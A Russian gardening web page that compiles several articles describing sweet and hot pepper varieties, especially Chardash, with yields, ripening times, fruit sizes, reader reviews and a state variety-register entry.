9 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Перец чардаш описание сорта

Перец сладкий: лучшие высокоурожайные сорта с фото и описанием

Сладкий перец – это кладезь витаминов. Этот овощ невероятно полезный для здоровья и очень вкусный. Существует масса рецептов для приготовления блюд со сладким перцем. Бесподобно вкусное блюдо — курочка тушенная со сладким перчиком в соевом соусе. О полезных качествах этого овоща можно говорить бесконечно. В статье вы сможете узнать всё о лучших высокоурожайных сортах перца.

Высокоурожайные сорта сладкого перца

Существует масса сортов этого овоща: ранние, среднеспелые, поздние и другие. Классификация сортов также делится по цветам, методу выращивания и срокам, вкусам и видам применения.

Ласточка

Этот перец относится к среднеспелым сортам, который подходит для выращивания в любых регионах. Полный период созревания наступает приблизительно на 120 сутки. Высота куста достигает до 60 см в высоту и нуждается в подвязке, поскольку стебель тонковат. Его плоды имеют форму конуса, на этапе зрелости становятся красного цвета. Спелый перец в длину до 10 см и весом примерно 80 г. Особенность сорта – высокая всхожесть семян.

Белозерка

Отличный сорт для переменчивого климата. Белозерка очень устойчив к перемене «погодного настроения». Высота растения максимум 80 см, но обязательно стебель подвязывать к вертикальной опоре. Этот перец очень примечателен своей устойчивостью к болезням и паразитам. Плод конусообразного вида. Окрас меняется от зеленого до ярко-красного. Масса плода примерно 80-100 г. Этап созревания наступает на 110 сутки.

Толстый барон

Толстый барон — вид крупноплодного перца с толстыми стенками. Его относят к среднеспелым сортам. Фаза зрелости наступает примерно на 130 сутки. Плоды большие, могут достигать веса в 160-200 г. Форма — кубообразная с закругленными уголками. При наступлении этапа спелости – огненно-красный. Толстый барон считается высокоурожайным сортом, поскольку с 1 кв.м можно собрать до 6 кг перца. Толщина стенок плода примерно 6-7 мм. Минусом этого перца является его неустойчивость к заболеванию-вертициллез.

Калифорнийское чудо

Вид сладкого перца – Калифорнийское чудо относится к среднеспелым, низкорослым, толстостенным сортам. Срок полного созревания примерно 130 дней. Высота кустиков от 25 до 45 см. Средний вес плода – 70-120 г. Овощи имеют кубовидную форму с толстыми стенками. Цвет перца: бордово-красный, в состоянии полного созревания. Отлично подходит как для тепличного выращивания, так и для роста на открытой почве. За счет толщины стенок, длительно хранится. Хорошо сопротивляется вирусу мозаики.

Богатырь

Сорт Богатырь хорошо применяется в приготовлении свежих салатов. Его относят к среднеспелым сортам. Период вегетации может составлять до 155 суток. Крупноплодный вид, вес овоща достигает до 170 г, в длину примерно 12 см. Призмообразной формы. Стенки овоща плотные. Высота растения 50-80 см, требует подвязки. Богатырь обладает качествами, которые ценятся при рыночных продажах овощей.

Винни Пух

Сладкий перец Винни Пух – раннеспелый сорт, период полного созревания 100 дней. Кустики растения невысокие, до 30 см. Отличный вид для выращивания в теплицах. Мало облиственные. Плоды конусной формы, с острым носиком. Так же как и сам кустик, перчик маленького размера (вес до 40 г, длина не превышает 10 см). Поскольку плоды мелкие, овощ хорошо подходит для консервации.

Буратино

Универсальный сорт перца, подлежащий выращиванию как в открытом грунте, так и в тепличных условиях. Имеет довольно высокий кустик – 100 см. Листва мелкая, насыщенно-зеленого цвета. Плоды до 120 г и до 25 см в длину, плотные и упругие. Окрас овощей, темно-красный, немного с коричневатым отливом. Хороший овощ для приготовления холодных закусок.

Атлантик

Гибрид сладкого перца. Сорт хорошо приживается в условиях северных регионов. По содержанию витамина группы С, превосходит лимон и апельсин. Крупный вид перца, размер овоща: вес – до 150 г, длина – до 25 см. Период полного созревания составляет до 115 суток. Форма призмообразная, трех или четырехгранная. Высота кустика до 110 см. Сохраняет вкусовые качества даже после заморозки.

Чардаш

Детерминантный, раннеспелый вид. Чардаш — сладкий перец с крупными плодами, масса одного овоща: 160-210 г. Кустик компактный, среднего роста – 70 см. Плоды растут пучками, как букет. В период биологической зрелости, цвет перчика – красно-оранжевый. Урожайность до 10 кг на кв.м. Сорт выглядит очень декоративно и красиво. Может служить в качестве украшения праздничного стола.

Подарок Молдовы

Это полуштамбовое, среднеспелое растение. Плоды сорта крупные, упругие и сочные. Сам перчик плотный, легко режется. Замечательно подходит для консервирования, засола и маринования. Вес плода примерно грамм 75. Рост куста максимум 60 см. Период полного созревания – 135 суток. Кисти перчинок растут букетным видом. Этот перец очень любит влагу.

Джемини

Джемини – гибридный, крупноплодный, стрессоустойчивый, высокоурожайный класс сладкого перца. Цвет перца в фазе зрелости ярко-желтый. Красиво сочетается в салатах, со смесью красного перца. Плоды – крупные: весом до 400 г, длиной до 20 см. Период созревания 80 дней от высадки рассады. Высота растения до 80 см. Листва густая, ярко-зеленого цвета. Овощи устойчивы к некоторым видам болезней и солнечным ожогам.

Кардинал

Необычный вид сладких перчинок – Кардинал. Он очень интересен своим цветом. В момент созревания окрас становится темно-фиолетовым. Такой перчик разнообразит любое блюдо. Плоды его крупные, весом до 250 грамм, кубовидной формы, четырехкамерные. Рост у куста до 100 сантиметров. Технически спелым, перец становится примерно на 90 день. При правильной агротехнике, урожайность может составить до 15 кг с 1 кв.м.

Отзывы

Анна: «В топ-3 моих любимых сортов сладкого перца входят: «Винни Пух», «Джемини», «Толстый барон». Плоды этих сортов крупные, ярко-красного цвета. Отлично используются в приготовлении свежих салатов. Уход за перчиками не сложный, но результат отличный. В одном овоще собрано множество витамин».

Юрий: «В сфере продаж овощей я работаю длительный период времени. В летний сезон овощ особенно популярен среди овощей. Для меня самым важным в выборе сортов является его транспортабельность и длительное хранение. Этим условиям отлично соответствуют сорта сладкого перца: «Буратино», «Калифорнийское чудо» и «Атлантик»».

Георгий: «Сорт перца «Богатырь» оценил во второй год выращивания. При выборе этого перца, тщательно ознакомился с его характеристиками. Когда кустик подрос, думал, что плоды будут мелкими, но нет, они превзошли все мои ожидания. Жена любит этот сорт фаршировать мясом или «по-вегетариански». Рекомендую».

Марина: «В огородных делах я новичок. Но, очень люблю сладкий перец использовать в различных блюдах. Что может быть лучше, чем свои овощи и фрукты, я не знаю. Я определила два сорта перчинок, которые соответствуют всем моим требованиям – это «Подарок Молдовы» и «Винни Пух». Они практически не прихотливы в уходе, устойчивы к болезням и имеют крупные плоды».

Выбираем семена перцев: обзор лучших сортов для открытого грунта

Сортимент перца просто огромен и каждый год приносит свою порцию новых сортов и гибридов этого вкусного и полезного овоща, без которого трудно представить себе приусадебный участок любого российского огородника.

В столь широком разнообразии легко запутаться, поэтому, прежде чем браться изучать каталоги, следует определиться с тем, какие характеристики растения наиболее интересны для вас: раннее созревание или позднее, неприхотливые в выращивании середнячки или требовательные рекордсмены, мелкие плоды или огромные и так далее.

Ну а мы в данной статье расскажем о действительно наилучших представителях различных групп перцев.

Острые сорта

Язык дракона

Острый перец Язык дракона

Среднеспелые мощные растения хорошо кустятся, до метра высотой. Ярко красные плоды, как длинный язык, — сплюснутые по бокам длинные (до 120 мм) стручки, весом до 60 г. По мнению многих огородников это лучшие по вкусу перцы.

Суперчили

Сорт острого перца СУперчили

Плоды Суперчили до 70 мм в длину имеют массу до 25 г. Их форма – удлинённый конус, а цвет меняется от зелёного до бордово-красного. Плоды острые, вкусные, ароматные.

Красная Молния F1

Сорт острого перца Красная молния

Выращивать Красную Молнию можно и на открытом воздухе и в плёночных укрытиях. Растения этого сорта высокие (115 см) и раскидистые с длинными узкоконусовидными тёмно-красными плодами, стенка которых толщиной в 4 мм, а масса составляет 100 грамм. На вкус они полуострые с перечным ароматом.

Низкорослые сорта

Болгарские сладкие перцы низкорослых сортов, относящиеся к детерминантной группе идеальны как для парников, так и для выращивания под открытым небом.

Их высаживают гораздо гуще, чем более высокорослые перцы, — от 8 до 12 растений на каждом квадратном метре. Низкорослые перцы не нуждаются в формировке, они, как правило, холодостойкие и крупноплодные.

Чардаш

Сорт сладкого перца Чардаш

Их плоды вступают в техническую зрелость на 95 день, а в биологическую, — на 132 день, достигая массы в 220 грамм при толщине стенок – 6 мм.

Форма перчиков конусовидная, цвет, по мере созревания меняется от жёлто-оранжевого до оранжево-красного, на стебле они располагаются букетами, направленными вниз, что выглядит эффектно и эстетично.

Плоды подходят для употребления в любой степени зрелости. Чардаш хорошо завязывается и обладает очень высокой урожайностью – до 10 кг с каждого квадратного метра. Сорт можно выращивать как в открытом грунте, так и под укрытиями с плотностью посадки до 1 000 растений на сотку.

Ерошка

Сорт сладкого перца Ерошка

Четырёхгранные перчики кубовидной формы достигают массы в 180 грамм, при толщине стенок в 5 мм. Что касается цвета плодов, то он, по мере созревания, меняется от светло-зелёного до оранжево-красного.

Урожайность Ерошки достаточно высока при том, что созревание наступает дружно. Количество плодов на каждом растении достигает 16 штук.

Растения высаживаются по 1 000 – 1 500 особей на сотку, как в открытый грунт, так и под плёночные укрытия. Кусты перца не нуждаются в формировке и подвязке.

Плоды можно употреблять свежими, а также консервировать. Сорт Ерошка отличается устойчивостью к мозаике, вершинной гнили и вертициллёзу.

Высокоурожайные сорта

Латино F1

Сорт перца Латино

А сделать это ему позволят сорта, отличающиеся наивысшей урожайностью. Они, как правило, самые популярные на приусадебных участках огородников-любителей.

Раннеспелый гибрид перца, биологическая зрелость плодов которого наступает через 100 дней выращивания. Кусты растения достигают высоты в 100 см.

Латино F1 подходит для выращивания в условиях защищенного грунта, а также на поле, при соответствующих погодных условиях.

Его кубовидные красные плоды с толстыми стенками и отличным вкусом достигают массы в 0.2 кг. Урожайность гибрида достигает 14 кг на квадратный метр.

Клаудио F1

Сорт сладкого перца Клаудио

Его тёмно-красные плоды имеют кубовидно-удлинённую форму и массу до четверти килограмма каждый.

Гибрид проявляет устойчивость к распространённым заболеваниям перца и предназначается для культивирования в условиях защищённого грунта и при подходящих климатических условиях – в открытом грунте.

Скороспелые сорта

Буратино F1

Сорт скороспелого перца Буратино

В данном разделе представлены перцы, вступающие в плодоношение раньше всех. Растения этого гибрида высокие, слабоветвящиеся, урожайные (до 1 кг 400 г с каждого куста).

Плоды очень сладкие и крупные (120 грамм), имеют вытянутую форму, на каждом кусту произрастает до 15 штук. Срок созревания составляет 88 дней.

По достижению технической зрелости, что обычно происходит в июле, перчики уже можно начинать употреблять в пищу. Для заготовок подходят зрелые плоды.

Возможно, Вам будет интересна статья о ранних сортах перца.

О том, как подготовить семена перца для посадки, Вы можете почитать здесь.

Перчики лёжкие и транспортабельные. Растения Буратино F1 — среднестойкие против табачной мозаики и практически не поражаются вершинной гнилью.

Здоровье

Сорт перца Здоровье

Интересно, что даже низкий уровень освещения в теплице не снизит урожайность паприки, каждое растение даст до 0.8 кг плодов, массой по 40 грамм каждый. Максимальное их количество на одном кусте составляет 45 шт.

Сорт устойчив к вершинной гнили, использовать его плоды можно в самых разных блюдах, а также целиком консервировать.

Толстостенные сорта

Какаду F1

Сорт перца Какаду F1

Детище селекционеров из компании «Гавриш», раннеспелый (100 дней) гибрид Какаду F1. Он представляет собой раскидистый куст, достигающий полутора метров в высоту, способный давать достаточно высокие урожаи.

Но главным его достоинством является масса ярко-красных удлинённо-цилиндрических перчиков. Плоды, отличающиеся сладостью и выраженным ароматом, могут достигать веса в 500 г.

Требия

Сорт перца Требия

Куст средних размеров с кубовидно-удлинёнными плодами, цвет которых по фазам созревания меняется от светло зелёного до насыщенного жёлтого. Длина перчика до 15 сантиметров, диаметр – до 11 см, при толщине стенок в 1 см.

Самой же примечательной характеристикой плода является его масса, которая составляет до 0.5 кг. Даже при повышенных температурах гибрид даёт большую массовую долю красивых стандартных плодов.

Перец устойчив к бронзовой пятнистости и табачной мозаике. Плоды потребляют сырыми и перерабатывают.

Какие сорта перца подойдут для открытого грунта, смотрите видео обзор в следующем ролике:

Чардаш — сорт растения Перец сладкий

Характеристики сорта:

Свойства сорта Чардаш:

Рекомендуемый регион на карте:

Информация о допуске Перец сладкий Чардаш из Реестра Госсорткомиссии РФ

Заявка на допуск №39271 , зарегистрирована 2002-12-24 . Сорт Перец сладкий Чардаш включен в реестр допущенных в 2003 году . Допущен к использованию в регионах: Северный, Северо-Западный, Центральный, Волго-Вятский, Центрально-черноземный, Северо-Кавказский, Средневолжский .

Оригинатором сорта Перец сладкий Чардаш является:

  • ООО СЕЛЕКЦИОННО-СЕМЕНОВОДЧЕСКАЯ ФИРМА `МАНУЛ`
    (141009, МОСКОВСКАЯ ОБЛ., Г.МЫТИЩИ, ЯРОСЛАВСКОЕ Ш., Д.116 А, СТРОЕНИЕ 1)

Другие сорта растения Перец сладкий

Поиск сорта по названию
Подбор сорта
Вопрос экспертам портала

Если вы не нашли ответ на вопрос — не стесняйтесь, задайте вопрос эксперту.

Зарегистрируйтесь или Войдите, чтобы каждый раз не указывать Имя и Электронную почту

Спасибо за комментарий! Он будет опубликован после проверки модератором!

Комментариев еще нет, станьте первым!

Портал для тех, кто любит свою дачу

Ваш вопрос отправлен на модерацию.
Не переживайте, мы быстро проверяем вопросы и ответ на ваш вопрос будет оставлен в течение 1 дня.

Мы обратили внимание, что вы уже зарегистрированы на нашем сайте. Рекомендуем авторизоваться, чтобы просмотреть созданный вопрос. Если вы не помните пароль — можете восстановить его.

Вы не были зарегистрированы до сегодняшнего дня, поэтому мы зарегистрировали вас. Ваш пароль отправлен вам на указанный почтовый ящик.

Помогите нашему сайту развиваться!

Пожалуйста, прочитайте это обращение, оно не отнимет у вас много времени!

Нам так не хватает ваших комментариев и вопросов, чтобы понимать в каком направлении нам развиваться.

Не забудьте оставить комментарий, если вы нашли то что искали.
А если не нашли — задайте вопрос через форму «Спросить эксперта» в шапке сайта.
Мы ответим на этот вопрос, и другие посетители смогут найти ту информацию, которую не смогли найти вы.

С уважением,
команда портала Дача-Дача.ру

Ваш вопрос отправлен на модерацию.
Не переживайте, мы быстро проверяем вопросы и ответ на ваш вопрос будет оставлен в течение 1 дня.

Мы обратили внимание, что вы уже зарегистрированы на нашем сайте. Рекомендуем авторизоваться, чтобы просмотреть созданный вопрос. Если вы не помните пароль — можете восстановить его.

Вы не были зарегистрированы до сегодняшнего дня, поэтому мы зарегистрировали вас. Ваш пароль отправлен вам на указанный почтовый ящик.

Самые неприхотливые сорта перцев

Всего полвека тому назад существовало не больше сотни сортов болгарского перца, известны были только бледно-зеленые и красные плоды. На сегодняшний день селекционеры вывели уже больше тысячи самых лучших сортов и гибридов этого полезного и вкусного овоща. Сейчас есть разные по вкусу перцы: сладкие, кисло-сладкие, горькие, а также разноцветные сорта: желтые, красные, оранжевые, зеленые и фиолетовые, даже белые перцы встречаются достаточно часто.

Болгарский перец – немного «капризная» культура :

  • он высаживается только рассадным способом;
  • предпочитает рыхлые, черноземные почвы;
  • любит тепло и влагу;
  • не может нормально развиваться без достаточного количества солнца;
  • имеет хрупкие побеги, которые нужно подвязывать и прищипывать.

Несмотря на все это, селекционерам удалось вывести массу неприхотливых сортов перцев, самые лучшие из них будут представлены ниже.

Чем отличаются сорта перцев

Неприхотливость – не единственное качество, которым должны обладать сорта, выбранные для выращивания на огороде или даче. Для растений не менее важны :

  • стойкость к различным заболеваниям;
  • способность выдержать падение температуры;
  • вкусовые качества;
  • товарные характеристики овощей;
  • сроки созревания.

Для северных регионов страны и Урала больше всего подходят раннеспелые сорта . Плоды таких перцев успеют вызреть за пару месяцев короткого и холодного лета. Кроме того, именно ранние сорта дают самые обильные урожаи, перцы отличаются хорошими вкусовыми качествами, подходят для выращивания как в теплицах, так и в открытом грунте.

На юге страны тоже чаще всего выращивают ранние или среднеспелые сорта и гибриды. Но в регионах с длинным, теплым летом можно возделывать и перцы с поздними сроками созревания. Они менее урожайны, чем ранние, зато свежие овощи на грядках будут расти вплоть до первых заморозков – середины октября.

Как правильно выращивать перцы

Сорта болгарского перца, которые не требуют особенного ухода, все равно нуждаются в некоторых обязательных этапах:

  1. Высадке в грунт или в теплицу рассадным способом. Рассаду необходимо готовить за 1,5-2 месяца до этого. Семена сеют в большие ящики, а затем пикируют в индивидуальные емкости.
  2. Предварительной подготовке почвы: удобрении, вскапывании, обеззараживании.
  3. Молодые растения не должны подвергаться низким температурам, даже стойкие сорта лучше укрывать на ночь плотной пленкой или специальным агроволокном.
  4. Важно знать, когда необходимо собирать урожай – техническая зрелость перцев определяется их цветом. Часто нарисованные на упаковке с семенами красные плоды можно срывать, когда они имеют зеленый оттенок. Такие овощи вполне пригодны для употребления в пищу, содержат все необходимые витамины и вещества. При хранении можно заметить, что цвет кожуры меняется – это говорит о биологической зрелости овоща.

«Красный квадрат»

Сорт относится к раннеспелым – первые плоды можно есть через 110 дней после высадки семян. Кустики вырастают небольшими, их высота достигает 70 см. Сами перцы имеют форму куба с четкими гранями. Внутри овощ разделен на четыре камеры с семенами.

Окрас зрелого плода – ярко-зеленый, после хранения меняется на алый. Толщина стенок достигает 9 мм, что делает плод очень вкусным и сочным. Масса каждого овоща составляет не менее 280 грамм.

Растение устойчиво к большинству вирусных заболеваний, свойственных пасленовым культурам. Зрелые перцы хорошо переносят транспортировку, могут долго храниться.

«Айвенго»

Одним из самых неприхотливых сортов считается «Айвенго». Этот перец растет небольшими кустиками, его не нужно подвязывать и прищипывать, что существенно упрощает уход за растениями.

Культура является раннеспелой, первые овощи можно есть уже в стадии технической зрелости – на 105-ый день после высевки семян.

Плоды вырастают небольшие, массой до 120 грамм. Кожура окрашена сначала в молочно-белый оттенок, а после полного созревания приобретает алый окрас. Толщина стенок колеблется от 5,5 до 6 мм. Форма перца – конусовидная, овощ разделен на две или три камеры, внутри есть множество семян.

Сорт «Айвенго» ценится в первую очередь за свои товарные качества – отлично переносит транспортировку, долго хранится, урожай состоит из гладких и ровных плодов.

«Фунтик»

Полудетерминантный сорт болгарского перца – «Фунтик» созревает к 110-120-му дню после высадки семян. Кустики компактные, высота их лежит в пределах 50-70 см. На растениях много листвы и боковых побегов, а также – большое количество завязей. На каждом кусте перца одновременно созревает около 17 плодов.

Плоды имеют конусовидную, слегка неровную, форму. Сорт очень неприхотлив – стойко противостоит болезням и вертициллезному увяданию, выращивать культуру можно и на грядке, и в закрытой теплице.

«Чардаш»

Детерминантный сорт сладкого перца – «Чардаш» относится к высокоурожайным сортам. С одного компактного куста можно снять до 18 плодов. Форма перцев конусовидная, масса каждого достигает 220 грамм. Толщина стенок составляет 6 мм.

Зрелые овощи окрашены в оранжево-красный цвет. Завязи на низеньких кустах появляются пучками, растение становится очень красивым в период вызревания перцев.

Сорт не заражается многими вирусами и болезнями, стойко переносит ухудшение погодных условий. «Чардаш» можно выращивать и в теплице, и в открытом грунте. Овощи подходят как для консервирования, так и для употребления в свежем виде.

«Воловье ухо»

Культура относится к среднеспелым, первые овощи можно снимать уже на 130-ый день после высадки семян на рассаду. Сорт подходит для выращивания в открытом грунте и для высадки под пленку, в теплицу.

Кустики вырастают небольшими, сами перцы имеют средние размеры – длина составляет 16 см, а масса – 200 грамм. Оттенок плодов – ярко-зеленый, к полному вызреванию становится красным. Стенки овоща имеют достаточно большую толщину – до 8 мм, что делает перец этого сорта очень сочным и «мясистым».

Невзирая на сочность, овощи достаточно долго могут храниться без потери упругости. Зрелые перцы имеют конусовидную удлиненную форму, слегка гофрированную кожуру.

Плоды можно консервировать, добавлять в различные блюда и салаты.

«Атлант»

Относится к тем редким сортам болгарского перца, которые любят загущенную посадку. Такая культура хорошо приживется на тесном дачном участке, в небольшой теплице или пленочном тоннеле.

Благодаря высокой урожайности, «Атлант» стал любимчиком многих огородников – он дает стабильно высокие урожаи. Сами плоды достаточно крупные – их длина составляет 26 см, а масса достигает 250 грамм. Толщина стенок плода может доходить до 11 мм, что делает перец очень сочным и вкусным.

«Ерошка»

Сорт, относящийся к среднеранним, отдает плоды на 120-ый день после высадки семян на рассаду. Кустики вырастают совсем небольшими – их высота достигает лишь 50 см. Это не мешает сорту «Ерошка» считаться одним из самых высокоурожайных. Растение дружно отдает плоды, с одного куста можно снять около 16 зрелых перцев одновременно.

По форме овощ похож на куб со слабым ребрением, внутри он разделен на четыре камеры, наполненные семенами.

Сначала плоды окрашены в бледно-зеленый цвет, а по мере созревания становятся красными. Растение устойчиво к различным болезням и паразитам, не требует сложного ухода, может выращиваться любым способом (на грядке или под пленкой). Плоды имеют отличные вкусовые характеристики, могут использоваться в любом виде.

«Лимонное чудо»

Сорт с очень красивыми, ярко-желтыми, плодами. Растение отдает плоды рано – на 112-ый день после высадки в грунт, достигает небольшой высоты – кустики компактные, до 60 см.

Плоды вырастают достаточно крупными – часто их масса превышает 200 грамм. Кожура плодов гладкая, стенки – толстые.

Перцы сорта «Лимонное чудо» прекрасно выглядят в банках, имеют отменный вкус и аромат. Культура нормально переносит плохие погодные условия, не нуждается в тщательном и сложном уходе.

«Геракл»

Очень урожайный среднеспелый сорт болгарского перца. На одном растении появляется множество завязей, плоды вырастают очень крупными, поэтому кустики необходимо подвязывать.

Зрелые перцы окрашены в ярко-красный цвет, имеют глянцевую кожуру и кубовидную форму. Средняя масса одного овоща составляет 350 грамм, стенки имеют толщину до 10 мм. Вкус плодов отменный: сочный, насыщенный, с особым «перечным» ароматом. Овощ подходит для выращивания любым способом.

Растение неприхотливое, все, что ему необходимо, – своевременное подвязывание побегов с молодыми плодами.

«Сибирский бонус»

Этот необыкновенный сорт признан не только на территории России, но и во всем мире. Отличительная черта перца – толстая, плотная мякоть. Ведь толщина стенок овоща достигает 12 мм.

Перцы вырастают до 300 грамм, имеют форму куба, их кожура и мякоть окрашены в насыщенный оранжевый цвет.

С небольших кустов, высота которых редко превышает 50 см, можно получить высокий урожай сладкого, сочного перца необычного оттенка. При всех заслугах, сорт совершенно не прихотлив, хорошо переносит заболевания и может выращиваться даже в северных регионах.

Овощи отлично подходят для консервирования, засолки, приготовления различных блюд и свежих салатов.

«Солнце Италии»

Один из лучших коммерческих сортов – перец «Солнце Италии». Необыкновенно большие плоды достигают веса в 600 грамм, конечно, для достижения такого результата придется потрудиться.

Однако растение достаточно неприхотливо, может выращиваться даже в открытом грунте. Кусты вырастают низкими и компактными – до 50 см в высоту.

Плоды окрашены в желто-оранжевый цвет, имеют правильную призмовидную форму и блестящую гладкую кожуру. Овощи отлично переносят транспортировку даже на дальние расстояния, подлежат длительному хранению, устойчивы к различным заболеваниям.

«Шорокшары»

Произведение молдавских селекционеров – сорт сладкого перца «Шорокшары» не раз становился победителем международных выставок.

Растение вырастает всего на 40-50 см, но имеет множество плодов. С одного такого кустика можно снять до 20 перцев. Сами перцы отличаются крупными размерами – их масса часто достигает 400 грамм.

Форма плода – конусовидная, стенки ровные и гладкие. Мякоть этого овоща очень сочная с необычным пряным ароматом. Из плодов можно готовить любые блюда, но лучше всего он подходит для консервированных салатов и лечо.

На одном кустике сразу может находиться масса плодов разного оттенка: от бледно-зеленого, до желтого и оранжево-красного.

«Белозерка»

Один из самых неприхотливых сортов – «Белозерка». Этот перец знают и на юге, и на севере. В любых климатических условиях растение дает достаточно высокий и стабильный урожай.

Сами плоды имеют отменный товарный вид – крупные размеры, одномерные овощи, гладкая кожура желтого оттенка.

Сорт можно выращивать и на огороде, и в парнике, и в теплице.

«Анастасия»

В этом сорте самое примечательное – форма и окрас плодов. Перцы имеют необычную сердцеобразную форму и насыщенно-вишневый оттенок.

Зрелые плоды очень похожи на томаты – такие же сочные, аппетитные и сладкие, с толстой «мясистой» мякотью.

Для этого сорта не очень важны условия выращивания. Он дает обильные урожаи не только на грядке, в теплице и парнике, но даже на балконе и в цветочном вазоне.

«Золотой юбилей»

Один из раннеспелых сортов болгарского перца имеет невысокие кустики и пышную крону. Овощ относится к высокоурожайным, дает стабильно большое количество плодов.

Сами перцы окрашены в сочный оранжевый цвет, имеют форму куба и достаточно толстые стенки – до 7 мм.

Масса каждого овоща достигает 150 грамм. Перцы имеют отличный вкус и аромат, подходят для приготовления самых разных блюд.

«Бел Гой»

Редкий сорт, семена которого не найти на рынке, их продают только в крупных магазинах. Растение достигает в высоту 120 см, поэтому его предпочтительнее выращивать не на грядке, а в теплице, подвязывая на шпалеру.

Сами плоды тоже очень крупные – средняя их масса составляет 400 грамм. Форма овоща – удлиненная кубовидная. Мякоть сочная и ароматная.

Чем определяется неприхотливость перца

Информация на пакетике с семенами о неприхотливости того или иного сорта говорит сразу о нескольких факторах:

  • меньших трудозатратах хозяина;
  • способности выдержать температурные колебания без сбрасывания цветков и завязей;
  • сопротивлении вирусам и болезням.

Огородники со стажем уже имеют свои любимые сорта овощей, а вот тем, кто впервые решил заняться земледелием придется поэкспериментировать, чтобы выбрать наиболее пригодный для конкретных условий сорт перца.

Лучшие сорта сладкого перца для открытого грунта и пленочных укрытий

Не каждый перец успеет вырасти и вызреть в условиях короткого лета, при недостатке тепла и света. Для этого требуются низкорослые, скороспелые, устойчивые к пониженным температурам неприхотливые сорта. Значит, плоды у них будут совсем непохожими на сладкие сочные мясистые южные перцы? Вовсе нет. Старые сорта, пригодные для Нечерноземья, и впрямь не отличались особым вкусом. Травянистые и суховатые, с тонкими стенками перцы годились разве что на заготовки. Но благодаря успехам селекционеров сегодня огородникам есть из чего выбирать. Появились новинки с плодами самой разнообразной окраски, от бледно-желтой до фиолетовой, не говоря уже об оранжевой, красной, бордовой, крупные и мелкие, круглые, кубовидные и конусовидные. При этом они имеют компактный куст, что облегчает уход за посадками, холодостойки, не требуют сложных укрытий для выращивания, устойчивы к болезням, вкусны и урожайны.

Ерошка

Очень ранний. Высота куста 30-50 см. Плоды в технической спелости светло-зеленые, при созревании оранжево-красные, кубовидной формы, массой 140-180 г, толщина стенки – 5 мм. Характеризуется дружной отдачей урожая и высокой нагрузкой плодов (до 16 штук на кусте). Сорт идеален для уплотненных посадок ленточным способом (через 12-15 см). Устойчив к вирусу табачной мозаики, вертициллезу, вершинной гнили.

Раннеспелый. Высота куста 50-70 см. Плоды в технической спелости зеленые, при созревании – красные, крупные, конусообразные, массой 140-180, толщина стенки 5-7 мм.

Характеризуется дружной отдачей урожая и прекрасным вкусом. Урожай формируется на двух ярусах. На кусте формируется 12-18 плодов. Устойчив к вирусу табачной мозаики, вертициллезу.

Чардаш

Очень ранний. Высота куста 60-70 см. Плоды в технической спелости желто-оранжевые, при созревании – оранжево-красные, конусовидные, массой 170-220 г, толщина стенки 5-6 мм. Характеризуется хорошим плодоношением, высокой урожайностью, плоды очень декоративны, пригодны к употреблению на любой стадии развития. На кусте формируется 13-17 плодов.

Юнга

Раннеспелый. Высота куста 50-60 см. Плоды в технической спелости темно-зеленые, при созревании – красные, конусовидной формы, массой 130-180 г, толщина стенки 6-7 мм.

Характеризуется хорошей нагрузкой плодами на кусте (8-15 штук), высокими вкусовыми качествами плодов. Подходит для уплотненной посадки.

F1 Буратино

Очень ранний. Высота куста 70 см. Плоды в технической спелости темно-зеленые, при созревании – красные, длинные конусовидные, массой 80-120 г, толщина стенки 5 мм.

Характеризуется дружной отдачей урожая, плоды хорошо хранятся, используются для консервирования. Устойчив к вирусу табачной мозаики и вершинной гнили.

Аккорд

Раннеспелый. Высота куста 70-100 см. Плоды в технической спелости светло-зеленые, при созревании – красные, конусовидные, массой 160-190 г, толщина стенки 6 мм. Характеризуется высокими вкусовыми качествами плодов, пригодностью для консервирования. Устойчив к вирусу табачной мозаики, вертициллезу.

Баргузин

Раннеспелый. Высота куста 80 см. Плоды в технической спелости зеленые, при созревании – желтые, длинные, конусовидные, массой 170-200 г, толщина стенки 6 мм. Характеризуется последовательным плодоношением, приспособленностью к различным условиям выращивания, плоды хороши в свежем виде. Устойчив к вирусу табачной мозаики.

Раннеспелый. Высота куста 50-90 см. Плоды в технической спелости желтоватые, при созревании оранжево-красные, красивой конусовидной формы с округлой верхушкой, 3- камерные, массой 80-160 г, толщина стенки 6-7 мм. Характеризуется дружным плодоношением, хорошей нагрузкой плодов на кусте (20-30 штук), высокой декоративностью и отличными вкусовыми качествами плодов.

Лицедей

Раннеспелый. Высота куста 70-150 см. Плоды в технической спелости светло-зеленые, при созревании – ярко-красные, конусовидные, массой 250-300 г, толщина стенки 6-7мм. Характеризуется высокой урожайностью, оригинальной окраской плодов и нетребовательностью к условиям выращивания. Устойчив к вирусу табачной мозаики.

Корнет

Раннеспелый. Высота куста 80-100 см. Плоды в технической спелости темно-зеленые, при созревании – коричневые, пониклые, призмовидные, массой 180-200 г, толщина стенки 5-6 мм. Характеризуется хорошей завязываемостью плодов, непрерывным плодоношением, плоды обладают повышенным содержанием витамина С и каротина.

Раннеспелый. Высота куста 80-100 см. Плоды в технической спелости зеленые, при созревании – красные, плотные, тяжелые сочные, направлены вверх, сердцевидно-призмовидные, массой 160-260 г, толщина стенки 8-10 мм. Характеризуется высокими вкусовыми качествами плодов, повышенной лежкостью и транспортабельностью, слабой осыпаемостью цветков.

Улыбка

Раннеспелый. Высота куста 70-100 см. Плоды в технической спелости зеленые, при созревании – красные, конусовидные, массой 180-250 г, толщина стенки 6-7 мм. Характеризуется стабильной урожайностью, хорошим вкусом плодов (пригодны в пищу на ранних стадиях развития). Устойчив к вирусу табачной мозаики.

Раннеспелый. Высота куста 80 см. Плоды в технической спелости светло-зеленые, при созревании – желтые, кубовидные, ребристые, массой 150-200 г, толщина стенки 6-8 мм. Характеризуется хорошей урожайностью, плоды используются в свежем виде и для консервирования. Устойчив вирусу табачной мозаики, вертицилезу и вершинной гнили.

Ссылка на основную публикацию
Adblock
detector
